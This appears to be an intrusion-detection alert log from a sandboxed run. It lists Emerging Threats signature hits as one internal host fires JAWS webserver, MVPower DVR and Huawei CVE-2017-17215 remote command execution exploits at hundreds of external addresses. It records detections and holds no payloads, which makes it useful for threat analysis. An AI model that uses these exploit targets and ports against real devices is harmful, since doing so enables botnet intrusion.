                    06/01/24-18:15:53.239032TCP2030092ET TROJAN JAWS Webserver Unauthenticated Shell Command Execution5151080192.168.2.23205.249.54.111
                    06/01/24-18:15:55.263651TCP2829579ETPRO EXPLOIT Huawei Remote Command Execution (CVE-2017-17215)5496237215192.168.2.2341.163.26.210
                    06/01/24-18:15:55.267351TCP2030092ET TROJAN JAWS Webserver Unauthenticated Shell Command Execution4223480192.168.2.2325.142.89.27
                    06/01/24-18:15:54.238224TCP2025883ET EXPLOIT MVPower DVR Shell UCE4952480192.168.2.23133.130.243.96
                    06/01/24-18:15:53.240112TCP2025883ET EXPLOIT MVPower DVR Shell UCE4771480192.168.2.23204.135.242.117
                    06/01/24-18:15:55.265552TCP2030092ET TROJAN JAWS Webserver Unauthenticated Shell Command Execution4602680192.168.2.2354.86.82.86
                    06/01/24-18:15:56.288149TCP2829579ETPRO EXPLOIT Huawei Remote Command Execution (CVE-2017-17215)4104237215192.168.2.23197.216.2.218
                    06/01/24-18:15:53.241607TCP2030092ET TROJAN JAWS Webserver Unauthenticated Shell Command Execution5288680192.168.2.2380.252.121.45
                    06/01/24-18:15:56.308506TCP2835222ETPRO EXPLOIT Huawei Remote Command Execution - Outbound (CVE-2017-17215)5203237215192.168.2.2341.32.190.153
                    06/01/24-18:15:55.261076TCP2835222ETPRO EXPLOIT Huawei Remote Command Execution - Outbound (CVE-2017-17215)4409237215192.168.2.2341.191.51.126
                    06/01/24-18:15:55.261955TCP2835222ETPRO EXPLOIT Huawei Remote Command Execution - Outbound (CVE-2017-17215)4717237215192.168.2.23156.112.193.48
                    06/01/24-18:15:55.263437TCP2835222ETPRO EXPLOIT Huawei Remote Command Execution - Outbound (CVE-2017-17215)4464237215192.168.2.23156.23.230.69
                    06/01/24-18:15:56.254840TCP2030092ET TROJAN JAWS Webserver Unauthenticated Shell Command Execution5014480192.168.2.23109.252.239.250
                    06/01/24-18:15:56.307552TCP2835222ETPRO EXPLOIT Huawei Remote Command Execution - Outbound (CVE-2017-17215)6062237215192.168.2.23197.5.152.126
                    06/01/24-18:15:55.261791TCP2829579ETPRO EXPLOIT Huawei Remote Command Execution (CVE-2017-17215)5235237215192.168.2.2341.12.1.243
                    06/01/24-18:15:55.263326TCP2835222ETPRO EXPLOIT Huawei Remote Command Execution - Outbound (CVE-2017-17215)6058837215192.168.2.23156.181.139.113
                    06/01/24-18:15:55.260639TCP2829579ETPRO EXPLOIT Huawei Remote Command Execution (CVE-2017-17215)4986837215192.168.2.23156.250.80.139
                    06/01/24-18:15:54.240221TCP2030092ET TROJAN JAWS Webserver Unauthenticated Shell Command Execution5353480192.168.2.23219.191.228.10
                    06/01/24-18:15:54.255789TCP2829579ETPRO EXPLOIT Huawei Remote Command Execution (CVE-2017-17215)4584037215192.168.2.23156.152.96.204
                    06/01/24-18:15:54.275592TCP2829579ETPRO EXPLOIT Huawei Remote Command Execution (CVE-2017-17215)5849637215192.168.2.2341.103.71.244
                    06/01/24-18:15:56.288149TCP2835222ETPRO EXPLOIT Huawei Remote Command Execution - Outbound (CVE-2017-17215)4104237215192.168.2.23197.216.2.218
                    06/01/24-18:15:56.254225TCP2030092ET TROJAN JAWS Webserver Unauthenticated Shell Command Execution4664880192.168.2.2364.170.221.237
                    06/01/24-18:15:53.239527TCP2030092ET TROJAN JAWS Webserver Unauthenticated Shell Command Execution3436080192.168.2.2392.228.245.159
                    06/01/24-18:15:53.241470TCP2030092ET TROJAN JAWS Webserver Unauthenticated Shell Command Execution5847680192.168.2.23223.81.79.132
                    06/01/24-18:15:54.253978TCP2835222ETPRO EXPLOIT Huawei Remote Command Execution - Outbound (CVE-2017-17215)3303837215192.168.2.2341.208.140.239
                    06/01/24-18:15:54.239497TCP2030092ET TROJAN JAWS Webserver Unauthenticated Shell Command Execution4519080192.168.2.2342.11.130.136
                    06/01/24-18:15:56.288050TCP2835222ETPRO EXPLOIT Huawei Remote Command Execution - Outbound (CVE-2017-17215)5354037215192.168.2.23197.92.83.61
                    06/01/24-18:15:55.260686TCP2829579ETPRO EXPLOIT Huawei Remote Command Execution (CVE-2017-17215)5773237215192.168.2.23156.1.199.155
                    06/01/24-18:15:56.245784TCP2025883ET EXPLOIT MVPower DVR Shell UCE5908680192.168.2.2363.169.38.14
                    06/01/24-18:15:56.246812TCP2030092ET TROJAN JAWS Webserver Unauthenticated Shell Command Execution4389680192.168.2.2338.25.43.161
                    06/01/24-18:15:56.245249TCP2030092ET TROJAN JAWS Webserver Unauthenticated Shell Command Execution5257080192.168.2.23204.99.201.107
                    06/01/24-18:15:56.254966TCP2025883ET EXPLOIT MVPower DVR Shell UCE5851280192.168.2.23188.86.168.160
                    06/01/24-18:15:56.245720TCP2025883ET EXPLOIT MVPower DVR Shell UCE4959480192.168.2.238.18.108.124
                    06/01/24-18:15:54.251192TCP2835222ETPRO EXPLOIT Huawei Remote Command Execution - Outbound (CVE-2017-17215)3736637215192.168.2.23156.33.225.228
                    06/01/24-18:15:53.240505TCP2030092ET TROJAN JAWS Webserver Unauthenticated Shell Command Execution5021880192.168.2.23159.209.163.86
                    06/01/24-18:15:53.239856TCP2025883ET EXPLOIT MVPower DVR Shell UCE5441680192.168.2.23146.97.242.87
                    06/01/24-18:15:55.260509TCP2829579ETPRO EXPLOIT Huawei Remote Command Execution (CVE-2017-17215)6010437215192.168.2.2341.146.68.75
                    06/01/24-18:15:54.240636TCP2030092ET TROJAN JAWS Webserver Unauthenticated Shell Command Execution3925880192.168.2.23108.12.66.222
                    06/01/24-18:15:54.253379TCP2835222ETPRO EXPLOIT Huawei Remote Command Execution - Outbound (CVE-2017-17215)5804837215192.168.2.23197.126.155.107
                    06/01/24-18:15:55.258791TCP2829579ETPRO EXPLOIT Huawei Remote Command Execution (CVE-2017-17215)3925637215192.168.2.23197.235.98.188
                    06/01/24-18:15:54.253732TCP2829579ETPRO EXPLOIT Huawei Remote Command Execution (CVE-2017-17215)5960837215192.168.2.23156.3.243.152
                    06/01/24-18:15:56.244906TCP2025883ET EXPLOIT MVPower DVR Shell UCE3737280192.168.2.2357.33.20.180
                    06/01/24-18:15:53.241435TCP2025883ET EXPLOIT MVPower DVR Shell UCE4876280192.168.2.23191.185.132.251
                    06/01/24-18:15:54.274390TCP2829579ETPRO EXPLOIT Huawei Remote Command Execution (CVE-2017-17215)4680637215192.168.2.2341.87.219.221
                    06/01/24-18:15:55.262188TCP2829579ETPRO EXPLOIT Huawei Remote Command Execution (CVE-2017-17215)5649037215192.168.2.23197.89.180.120
                    06/01/24-18:15:53.238205TCP2030092ET TROJAN JAWS Webserver Unauthenticated Shell Command Execution3945680192.168.2.23107.165.24.228
                    06/01/24-18:15:54.274985TCP2835222ETPRO EXPLOIT Huawei Remote Command Execution - Outbound (CVE-2017-17215)3996637215192.168.2.23197.239.222.81
                    06/01/24-18:15:53.247036TCP2025883ET EXPLOIT MVPower DVR Shell UCE5636280192.168.2.2344.214.37.113
                    06/01/24-18:15:54.239818TCP2025883ET EXPLOIT MVPower DVR Shell UCE5003680192.168.2.2399.223.38.236
                    06/01/24-18:15:54.240725TCP2025883ET EXPLOIT MVPower DVR Shell UCE3297480192.168.2.23190.157.211.94
                    06/01/24-18:15:54.274063TCP2835222ETPRO EXPLOIT Huawei Remote Command Execution - Outbound (CVE-2017-17215)4954037215192.168.2.23197.225.16.119
                    06/01/24-18:15:54.239975TCP2030092ET TROJAN JAWS Webserver Unauthenticated Shell Command Execution5552080192.168.2.23118.167.64.175
                    06/01/24-18:15:54.254666TCP2835222ETPRO EXPLOIT Huawei Remote Command Execution - Outbound (CVE-2017-17215)3862237215192.168.2.23197.213.9.188
                    06/01/24-18:15:54.238596TCP2025883ET EXPLOIT MVPower DVR Shell UCE3293680192.168.2.23189.82.218.132
                    06/01/24-18:15:54.275552TCP2829579ETPRO EXPLOIT Huawei Remote Command Execution (CVE-2017-17215)5812437215192.168.2.23156.254.50.144
                    06/01/24-18:15:56.307106TCP2835222ETPRO EXPLOIT Huawei Remote Command Execution - Outbound (CVE-2017-17215)4168037215192.168.2.23156.208.181.92
                    06/01/24-18:15:53.240242TCP2025883ET EXPLOIT MVPower DVR Shell UCE3492280192.168.2.23158.4.130.100
                    06/01/24-18:15:55.267731TCP2030092ET TROJAN JAWS Webserver Unauthenticated Shell Command Execution6016280192.168.2.23157.59.40.252
                    06/01/24-18:15:56.244628TCP2025883ET EXPLOIT MVPower DVR Shell UCE5331680192.168.2.23188.170.231.160
                    06/01/24-18:15:54.275098TCP2829579ETPRO EXPLOIT Huawei Remote Command Execution (CVE-2017-17215)4921837215192.168.2.2341.27.121.67
                    06/01/24-18:15:53.239781TCP2025883ET EXPLOIT MVPower DVR Shell UCE5007880192.168.2.23129.193.114.98
                    06/01/24-18:15:54.238679TCP2025883ET EXPLOIT MVPower DVR Shell UCE5936880192.168.2.2345.9.82.52
                    06/01/24-18:15:56.307965TCP2835222ETPRO EXPLOIT Huawei Remote Command Execution - Outbound (CVE-2017-17215)4149237215192.168.2.23197.90.12.37
                    06/01/24-18:15:54.256554TCP2829579ETPRO EXPLOIT Huawei Remote Command Execution (CVE-2017-17215)5122437215192.168.2.2341.200.45.182
                    06/01/24-18:15:54.253439TCP2835222ETPRO EXPLOIT Huawei Remote Command Execution - Outbound (CVE-2017-17215)3964237215192.168.2.2341.89.44.248
                    06/01/24-18:15:56.244558TCP2025883ET EXPLOIT MVPower DVR Shell UCE5633480192.168.2.2345.33.63.82
                    06/01/24-18:15:55.261256TCP2835222ETPRO EXPLOIT Huawei Remote Command Execution - Outbound (CVE-2017-17215)4647037215192.168.2.2341.215.248.219
                    06/01/24-18:15:56.307042TCP2829579ETPRO EXPLOIT Huawei Remote Command Execution (CVE-2017-17215)4780037215192.168.2.2341.18.209.9
                    06/01/24-18:15:55.265263TCP2030092ET TROJAN JAWS Webserver Unauthenticated Shell Command Execution4552080192.168.2.2398.85.212.158
                    06/01/24-18:15:54.274736TCP2829579ETPRO EXPLOIT Huawei Remote Command Execution (CVE-2017-17215)4013437215192.168.2.23197.168.40.142
                    06/01/24-18:15:54.256242TCP2829579ETPRO EXPLOIT Huawei Remote Command Execution (CVE-2017-17215)4577837215192.168.2.23197.46.115.89
                    06/01/24-18:15:53.239961TCP2025883ET EXPLOIT MVPower DVR Shell UCE3819480192.168.2.2348.234.108.156
                    06/01/24-18:15:54.274322TCP2835222ETPRO EXPLOIT Huawei Remote Command Execution - Outbound (CVE-2017-17215)5361637215192.168.2.23197.87.210.186
                    06/01/24-18:15:55.264930TCP2030092ET TROJAN JAWS Webserver Unauthenticated Shell Command Execution4674480192.168.2.23172.56.24.244
                    06/01/24-18:15:54.256952TCP2829579ETPRO EXPLOIT Huawei Remote Command Execution (CVE-2017-17215)3714837215192.168.2.2341.238.177.50
                    06/01/24-18:15:56.308033TCP2829579ETPRO EXPLOIT Huawei Remote Command Execution (CVE-2017-17215)4628437215192.168.2.23156.113.114.137
                    06/01/24-18:15:55.265963TCP2030092ET TROJAN JAWS Webserver Unauthenticated Shell Command Execution6052080192.168.2.23104.115.107.154
                    06/01/24-18:15:54.238269TCP2030092ET TROJAN JAWS Webserver Unauthenticated Shell Command Execution4616480192.168.2.2381.66.87.121
                    06/01/24-18:15:54.254586TCP2829579ETPRO EXPLOIT Huawei Remote Command Execution (CVE-2017-17215)5402637215192.168.2.23197.236.203.121
                    06/01/24-18:15:55.262860TCP2835222ETPRO EXPLOIT Huawei Remote Command Execution - Outbound (CVE-2017-17215)3725037215192.168.2.2341.230.149.194
                    06/01/24-18:15:55.259969TCP2835222ETPRO EXPLOIT Huawei Remote Command Execution - Outbound (CVE-2017-17215)3379437215192.168.2.23156.84.73.50
                    06/01/24-18:15:56.306951TCP2829579ETPRO EXPLOIT Huawei Remote Command Execution (CVE-2017-17215)4862037215192.168.2.2341.121.54.211
                    06/01/24-18:15:54.254230TCP2835222ETPRO EXPLOIT Huawei Remote Command Execution - Outbound (CVE-2017-17215)4922437215192.168.2.2341.43.208.255
                    06/01/24-18:15:53.239557TCP2025883ET EXPLOIT MVPower DVR Shell UCE5623480192.168.2.2395.239.226.123
                    06/01/24-18:15:54.253835TCP2829579ETPRO EXPLOIT Huawei Remote Command Execution (CVE-2017-17215)5011237215192.168.2.2341.14.133.63
                    06/01/24-18:15:55.265799TCP2030092ET TROJAN JAWS Webserver Unauthenticated Shell Command Execution5399280192.168.2.2338.120.106.118
                    06/01/24-18:15:53.240367TCP2025883ET EXPLOIT MVPower DVR Shell UCE3370680192.168.2.23187.205.139.84
                    06/01/24-18:15:54.251351TCP2829579ETPRO EXPLOIT Huawei Remote Command Execution (CVE-2017-17215)4532837215192.168.2.23156.193.10.45
                    06/01/24-18:15:56.287440TCP2030092ET TROJAN JAWS Webserver Unauthenticated Shell Command Execution4074080192.168.2.2386.99.246.150
                    06/01/24-18:15:54.241927TCP2025883ET EXPLOIT MVPower DVR Shell UCE5248680192.168.2.23173.159.67.38
                    06/01/24-18:15:55.265775TCP2030092ET TROJAN JAWS Webserver Unauthenticated Shell Command Execution4970680192.168.2.2394.52.226.91
                    06/01/24-18:15:53.247003TCP2025883ET EXPLOIT MVPower DVR Shell UCE4078280192.168.2.23170.90.134.85
                    06/01/24-18:15:56.246473TCP2030092ET TROJAN JAWS Webserver Unauthenticated Shell Command Execution5095680192.168.2.2372.8.191.18
                    06/01/24-18:15:54.252592TCP2829579ETPRO EXPLOIT Huawei Remote Command Execution (CVE-2017-17215)4172437215192.168.2.2341.87.170.8
                    06/01/24-18:15:56.246141TCP2025883ET EXPLOIT MVPower DVR Shell UCE3737080192.168.2.23198.54.147.248
                    06/01/24-18:15:56.306077TCP2829579ETPRO EXPLOIT Huawei Remote Command Execution (CVE-2017-17215)3474237215192.168.2.2341.127.231.35
                    06/01/24-18:15:53.240978TCP2030092ET TROJAN JAWS Webserver Unauthenticated Shell Command Execution5355880192.168.2.2381.48.62.152
                    06/01/24-18:15:56.245498TCP2030092ET TROJAN JAWS Webserver Unauthenticated Shell Command Execution4213680192.168.2.2342.133.131.181
                    06/01/24-18:15:55.261120TCP2835222ETPRO EXPLOIT Huawei Remote Command Execution - Outbound (CVE-2017-17215)4833437215192.168.2.23197.50.165.9
                    06/01/24-18:15:55.264843TCP2030092ET TROJAN JAWS Webserver Unauthenticated Shell Command Execution4586880192.168.2.23205.243.6.97
                    06/01/24-18:15:54.256393TCP2835222ETPRO EXPLOIT Huawei Remote Command Execution - Outbound (CVE-2017-17215)3661437215192.168.2.23156.158.95.158
                    06/01/24-18:15:54.275251TCP2829579ETPRO EXPLOIT Huawei Remote Command Execution (CVE-2017-17215)5408037215192.168.2.23197.126.107.59
                    06/01/24-18:15:54.240025TCP2025883ET EXPLOIT MVPower DVR Shell UCE3368880192.168.2.2341.108.232.85
                    06/01/24-18:15:55.233813TCP2835222ETPRO EXPLOIT Huawei Remote Command Execution - Outbound (CVE-2017-17215)4936437215192.168.2.23156.251.227.241
                    06/01/24-18:15:55.265512TCP2030092ET TROJAN JAWS Webserver Unauthenticated Shell Command Execution4523680192.168.2.2391.87.51.114
                    06/01/24-18:15:53.238377TCP2030092ET TROJAN JAWS Webserver Unauthenticated Shell Command Execution4217880192.168.2.2341.79.241.72
                    06/01/24-18:15:54.255551TCP2829579ETPRO EXPLOIT Huawei Remote Command Execution (CVE-2017-17215)3953837215192.168.2.23197.75.33.112
                    06/01/24-18:15:53.237869TCP2030092ET TROJAN JAWS Webserver Unauthenticated Shell Command Execution5386280192.168.2.23149.115.99.191
                    06/01/24-18:15:54.252324TCP2835222ETPRO EXPLOIT Huawei Remote Command Execution - Outbound (CVE-2017-17215)4158637215192.168.2.23197.22.210.222
                    06/01/24-18:15:54.237993TCP2030092ET TROJAN JAWS Webserver Unauthenticated Shell Command Execution4705480192.168.2.23213.99.204.125
                    06/01/24-18:15:54.256497TCP2829579ETPRO EXPLOIT Huawei Remote Command Execution (CVE-2017-17215)3485237215192.168.2.2341.229.19.154
                    06/01/24-18:15:53.240062TCP2030092ET TROJAN JAWS Webserver Unauthenticated Shell Command Execution5150080192.168.2.23187.75.110.93
                    06/01/24-18:15:53.240794TCP2030092ET TROJAN JAWS Webserver Unauthenticated Shell Command Execution3321080192.168.2.23155.78.6.227
                    06/01/24-18:15:53.241160TCP2025883ET EXPLOIT MVPower DVR Shell UCE4295080192.168.2.23160.171.210.51
                    06/01/24-18:15:54.252358TCP2829579ETPRO EXPLOIT Huawei Remote Command Execution (CVE-2017-17215)5970037215192.168.2.2341.139.183.232
                    06/01/24-18:15:54.252286TCP2835222ETPRO EXPLOIT Huawei Remote Command Execution - Outbound (CVE-2017-17215)5236237215192.168.2.23156.45.224.43
                    06/01/24-18:15:56.287888TCP2829579ETPRO EXPLOIT Huawei Remote Command Execution (CVE-2017-17215)3758637215192.168.2.23197.60.54.58
                    06/01/24-18:15:56.306738TCP2829579ETPRO EXPLOIT Huawei Remote Command Execution (CVE-2017-17215)4443637215192.168.2.23156.142.205.5
                    06/01/24-18:15:55.261312TCP2829579ETPRO EXPLOIT Huawei Remote Command Execution (CVE-2017-17215)3568437215192.168.2.23197.27.178.48
                    06/01/24-18:15:53.246870TCP2025883ET EXPLOIT MVPower DVR Shell UCE6071680192.168.2.2318.69.98.66
                    06/01/24-18:15:55.260976TCP2829579ETPRO EXPLOIT Huawei Remote Command Execution (CVE-2017-17215)5597837215192.168.2.23197.175.191.141
                    06/01/24-18:15:54.254818TCP2835222ETPRO EXPLOIT Huawei Remote Command Execution - Outbound (CVE-2017-17215)3856637215192.168.2.2341.5.46.180
                    06/01/24-18:15:55.260163TCP2829579ETPRO EXPLOIT Huawei Remote Command Execution (CVE-2017-17215)3711437215192.168.2.23197.204.11.107
                    06/01/24-18:15:55.265899TCP2030092ET TROJAN JAWS Webserver Unauthenticated Shell Command Execution3714880192.168.2.2398.123.8.16
                    06/01/24-18:15:54.239533TCP2025883ET EXPLOIT MVPower DVR Shell UCE4136280192.168.2.2341.189.31.68
                    06/01/24-18:15:55.262262TCP2829579ETPRO EXPLOIT Huawei Remote Command Execution (CVE-2017-17215)3918237215192.168.2.2341.101.17.223
                    06/01/24-18:15:55.261518TCP2829579ETPRO EXPLOIT Huawei Remote Command Execution (CVE-2017-17215)3782237215192.168.2.23156.121.41.185
                    06/01/24-18:15:53.240919TCP2030092ET TROJAN JAWS Webserver Unauthenticated Shell Command Execution3387880192.168.2.23112.152.48.8
                    06/01/24-18:15:54.275135TCP2835222ETPRO EXPLOIT Huawei Remote Command Execution - Outbound (CVE-2017-17215)3912437215192.168.2.23156.191.243.96
                    06/01/24-18:15:53.246794TCP2025883ET EXPLOIT MVPower DVR Shell UCE4364680192.168.2.23121.59.20.215
                    06/01/24-18:15:54.251867TCP2829579ETPRO EXPLOIT Huawei Remote Command Execution (CVE-2017-17215)5369437215192.168.2.2341.23.36.64
                    06/01/24-18:15:53.240886TCP2025883ET EXPLOIT MVPower DVR Shell UCE3973280192.168.2.23128.151.195.102
                    06/01/24-18:15:54.274578TCP2829579ETPRO EXPLOIT Huawei Remote Command Execution (CVE-2017-17215)4822037215192.168.2.23197.173.199.249
                    06/01/24-18:15:56.307218TCP2835222ETPRO EXPLOIT Huawei Remote Command Execution - Outbound (CVE-2017-17215)5198237215192.168.2.2341.199.2.59
                    06/01/24-18:15:56.308362TCP2829579ETPRO EXPLOIT Huawei Remote Command Execution (CVE-2017-17215)3515037215192.168.2.2341.4.150.25
                    06/01/24-18:15:54.240667TCP2025883ET EXPLOIT MVPower DVR Shell UCE3903080192.168.2.23217.30.58.227
                    06/01/24-18:15:56.308485TCP2829579ETPRO EXPLOIT Huawei Remote Command Execution (CVE-2017-17215)5652837215192.168.2.23197.200.184.181
                    06/01/24-18:15:55.266133TCP2030092ET TROJAN JAWS Webserver Unauthenticated Shell Command Execution3297880192.168.2.23146.172.113.113
                    06/01/24-18:15:54.251978TCP2829579ETPRO EXPLOIT Huawei Remote Command Execution (CVE-2017-17215)5117637215192.168.2.2341.144.59.161
                    06/01/24-18:15:56.307586TCP2829579ETPRO EXPLOIT Huawei Remote Command Execution (CVE-2017-17215)4118437215192.168.2.23197.199.175.95
                    06/01/24-18:15:54.256096TCP2835222ETPRO EXPLOIT Huawei Remote Command Execution - Outbound (CVE-2017-17215)3519037215192.168.2.23156.2.158.240
                    06/01/24-18:15:56.246355TCP2030092ET TROJAN JAWS Webserver Unauthenticated Shell Command Execution4764680192.168.2.23108.218.98.173
                    06/01/24-18:15:54.252052TCP2829579ETPRO EXPLOIT Huawei Remote Command Execution (CVE-2017-17215)5348237215192.168.2.2341.13.150.2
                    06/01/24-18:15:53.239819TCP2025883ET EXPLOIT MVPower DVR Shell UCE4477880192.168.2.2325.87.20.30
                    06/01/24-18:15:53.241011TCP2025883ET EXPLOIT MVPower DVR Shell UCE4649080192.168.2.2393.152.148.219
                    06/01/24-18:15:54.237719TCP2025883ET EXPLOIT MVPower DVR Shell UCE5441080192.168.2.23147.89.17.146
                    06/01/24-18:15:56.306706TCP2835222ETPRO EXPLOIT Huawei Remote Command Execution - Outbound (CVE-2017-17215)3772437215192.168.2.23156.246.84.41
                    06/01/24-18:15:56.305968TCP2835222ETPRO EXPLOIT Huawei Remote Command Execution - Outbound (CVE-2017-17215)5919437215192.168.2.23197.192.206.29
                    06/01/24-18:15:53.241257TCP2030092ET TROJAN JAWS Webserver Unauthenticated Shell Command Execution3835480192.168.2.238.194.32.207
                    06/01/24-18:15:54.256689TCP2829579ETPRO EXPLOIT Huawei Remote Command Execution (CVE-2017-17215)5295637215192.168.2.23156.95.106.67
                    06/01/24-18:15:54.257008TCP2835222ETPRO EXPLOIT Huawei Remote Command Execution - Outbound (CVE-2017-17215)5814637215192.168.2.23156.249.12.23
                    06/01/24-18:15:54.255441TCP2829579ETPRO EXPLOIT Huawei Remote Command Execution (CVE-2017-17215)5216837215192.168.2.23156.32.96.160
                    06/01/24-18:15:55.267998TCP2030092ET TROJAN JAWS Webserver Unauthenticated Shell Command Execution4909680192.168.2.2359.33.69.191
                    06/01/24-18:15:54.257094TCP2829579ETPRO EXPLOIT Huawei Remote Command Execution (CVE-2017-17215)5185037215192.168.2.2341.201.77.122
                    06/01/24-18:15:54.237774TCP2025883ET EXPLOIT MVPower DVR Shell UCE6047280192.168.2.2349.81.200.207
                    06/01/24-18:15:54.239716TCP2025883ET EXPLOIT MVPower DVR Shell UCE5227480192.168.2.23106.72.36.51
                    06/01/24-18:15:53.238499TCP2030092ET TROJAN JAWS Webserver Unauthenticated Shell Command Execution3470080192.168.2.23202.238.8.254
                    06/01/24-18:15:54.274356TCP2835222ETPRO EXPLOIT Huawei Remote Command Execution - Outbound (CVE-2017-17215)4688237215192.168.2.23197.249.199.20
                    06/01/24-18:15:54.251379TCP2829579ETPRO EXPLOIT Huawei Remote Command Execution (CVE-2017-17215)3638637215192.168.2.2341.249.106.11
                    06/01/24-18:15:54.237923TCP2030092ET TROJAN JAWS Webserver Unauthenticated Shell Command Execution5854680192.168.2.2357.54.162.72
                    06/01/24-18:15:56.255441TCP2025883ET EXPLOIT MVPower DVR Shell UCE5051080192.168.2.2380.104.124.102
                    06/01/24-18:15:56.306901TCP2835222ETPRO EXPLOIT Huawei Remote Command Execution - Outbound (CVE-2017-17215)3465237215192.168.2.23156.60.77.246
                    06/01/24-18:15:56.246983TCP2030092ET TROJAN JAWS Webserver Unauthenticated Shell Command Execution5791280192.168.2.23133.6.1.52
                    06/01/24-18:15:56.305908TCP2829579ETPRO EXPLOIT Huawei Remote Command Execution (CVE-2017-17215)4372637215192.168.2.2341.201.42.167
                    06/01/24-18:15:54.254997TCP2835222ETPRO EXPLOIT Huawei Remote Command Execution - Outbound (CVE-2017-17215)4060437215192.168.2.23197.85.240.37
                    06/01/24-18:15:55.262143TCP2835222ETPRO EXPLOIT Huawei Remote Command Execution - Outbound (CVE-2017-17215)3592837215192.168.2.23156.189.243.5
                    06/01/24-18:15:55.233750TCP2835222ETPRO EXPLOIT Huawei Remote Command Execution - Outbound (CVE-2017-17215)3465837215192.168.2.23156.113.148.202
                    06/01/24-18:15:53.240081TCP2030092ET TROJAN JAWS Webserver Unauthenticated Shell Command Execution3383480192.168.2.23106.16.15.220
                    06/01/24-18:15:53.240757TCP2030092ET TROJAN JAWS Webserver Unauthenticated Shell Command Execution5678480192.168.2.23162.133.179.162
                    06/01/24-18:15:54.256369TCP2835222ETPRO EXPLOIT Huawei Remote Command Execution - Outbound (CVE-2017-17215)5175637215192.168.2.23156.196.70.199
                    06/01/24-18:15:53.239929TCP2025883ET EXPLOIT MVPower DVR Shell UCE3654680192.168.2.23196.44.130.154
                    06/01/24-18:15:54.251475TCP2835222ETPRO EXPLOIT Huawei Remote Command Execution - Outbound (CVE-2017-17215)5605037215192.168.2.23156.198.133.179
                    06/01/24-18:15:53.246870TCP2030092ET TROJAN JAWS Webserver Unauthenticated Shell Command Execution6071680192.168.2.2318.69.98.66
                    06/01/24-18:15:54.252766TCP2835222ETPRO EXPLOIT Huawei Remote Command Execution - Outbound (CVE-2017-17215)5564837215192.168.2.23197.218.44.219
                    06/01/24-18:15:56.255297TCP2030092ET TROJAN JAWS Webserver Unauthenticated Shell Command Execution5112280192.168.2.23112.77.116.122
                    06/01/24-18:15:54.255667TCP2835222ETPRO EXPLOIT Huawei Remote Command Execution - Outbound (CVE-2017-17215)5714237215192.168.2.2341.39.148.206
                    06/01/24-18:15:56.245577TCP2030092ET TROJAN JAWS Webserver Unauthenticated Shell Command Execution5210680192.168.2.23165.160.100.184
                    06/01/24-18:15:54.253117TCP2835222ETPRO EXPLOIT Huawei Remote Command Execution - Outbound (CVE-2017-17215)5197637215192.168.2.2341.137.161.29
                    06/01/24-18:15:54.274187TCP2829579ETPRO EXPLOIT Huawei Remote Command Execution (CVE-2017-17215)3541437215192.168.2.2341.44.205.135
                    06/01/24-18:15:56.254886TCP2030092ET TROJAN JAWS Webserver Unauthenticated Shell Command Execution5905080192.168.2.2351.132.195.236
                    06/01/24-18:15:56.254555TCP2030092ET TROJAN JAWS Webserver Unauthenticated Shell Command Execution3499480192.168.2.23168.145.45.26
                    06/01/24-18:15:54.241927TCP2030092ET TROJAN JAWS Webserver Unauthenticated Shell Command Execution5248680192.168.2.23173.159.67.38
                    06/01/24-18:15:54.239572TCP2030092ET TROJAN JAWS Webserver Unauthenticated Shell Command Execution5071080192.168.2.23198.203.182.175
                    06/01/24-18:15:56.245225TCP2025883ET EXPLOIT MVPower DVR Shell UCE4502480192.168.2.23201.6.73.207
                    06/01/24-18:15:54.237678TCP2030092ET TROJAN JAWS Webserver Unauthenticated Shell Command Execution3703480192.168.2.23194.244.242.70
                    06/01/24-18:15:54.237774TCP2030092ET TROJAN JAWS Webserver Unauthenticated Shell Command Execution6047280192.168.2.2349.81.200.207
                    06/01/24-18:15:53.237649TCP2030092ET TROJAN JAWS Webserver Unauthenticated Shell Command Execution4578680192.168.2.23134.10.23.167
                    06/01/24-18:15:54.252020TCP2835222ETPRO EXPLOIT Huawei Remote Command Execution - Outbound (CVE-2017-17215)5128837215192.168.2.23156.122.101.93
                    06/01/24-18:15:54.252650TCP2829579ETPRO EXPLOIT Huawei Remote Command Execution (CVE-2017-17215)3545837215192.168.2.2341.53.249.76
                    06/01/24-18:15:54.256631TCP2835222ETPRO EXPLOIT Huawei Remote Command Execution - Outbound (CVE-2017-17215)3779437215192.168.2.2341.88.60.138
                    06/01/24-18:15:55.267680TCP2030092ET TROJAN JAWS Webserver Unauthenticated Shell Command Execution5968080192.168.2.23117.50.6.59
                    06/01/24-18:15:53.247144TCP2025883ET EXPLOIT MVPower DVR Shell UCE4480880192.168.2.23188.248.176.49
                    06/01/24-18:15:54.275164TCP2835222ETPRO EXPLOIT Huawei Remote Command Execution - Outbound (CVE-2017-17215)5847237215192.168.2.23156.240.30.191
                    06/01/24-18:15:56.305803TCP2835222ETPRO EXPLOIT Huawei Remote Command Execution - Outbound (CVE-2017-17215)5017237215192.168.2.23197.78.23.227
                    06/01/24-18:15:56.307832TCP2835222ETPRO EXPLOIT Huawei Remote Command Execution - Outbound (CVE-2017-17215)4663637215192.168.2.23197.46.217.40
                    06/01/24-18:15:53.239596TCP2025883ET EXPLOIT MVPower DVR Shell UCE5105080192.168.2.23108.85.135.218
                    06/01/24-18:15:54.252809TCP2835222ETPRO EXPLOIT Huawei Remote Command Execution - Outbound (CVE-2017-17215)5380637215192.168.2.23197.239.209.224
                    06/01/24-18:15:55.259864TCP2829579ETPRO EXPLOIT Huawei Remote Command Execution (CVE-2017-17215)3866637215192.168.2.23197.174.153.53
                    06/01/24-18:15:55.272625TCP2030092ET TROJAN JAWS Webserver Unauthenticated Shell Command Execution3418480192.168.2.23169.128.130.40
                    06/01/24-18:15:56.254930TCP2025883ET EXPLOIT MVPower DVR Shell UCE5598480192.168.2.23103.40.87.16
                    06/01/24-18:15:55.261368TCP2829579ETPRO EXPLOIT Huawei Remote Command Execution (CVE-2017-17215)4513837215192.168.2.23156.193.29.187
                    06/01/24-18:15:56.246141TCP2030092ET TROJAN JAWS Webserver Unauthenticated Shell Command Execution3737080192.168.2.23198.54.147.248
                    06/01/24-18:15:56.246254TCP2025883ET EXPLOIT MVPower DVR Shell UCE3279680192.168.2.2373.230.71.26
                    06/01/24-18:15:54.256904TCP2829579ETPRO EXPLOIT Huawei Remote Command Execution (CVE-2017-17215)5843437215192.168.2.23197.24.244.117
                    06/01/24-18:15:54.273782TCP2829579ETPRO EXPLOIT Huawei Remote Command Execution (CVE-2017-17215)4614837215192.168.2.23197.69.9.82
                    06/01/24-18:15:56.307705TCP2835222ETPRO EXPLOIT Huawei Remote Command Execution - Outbound (CVE-2017-17215)4047437215192.168.2.23156.148.149.212
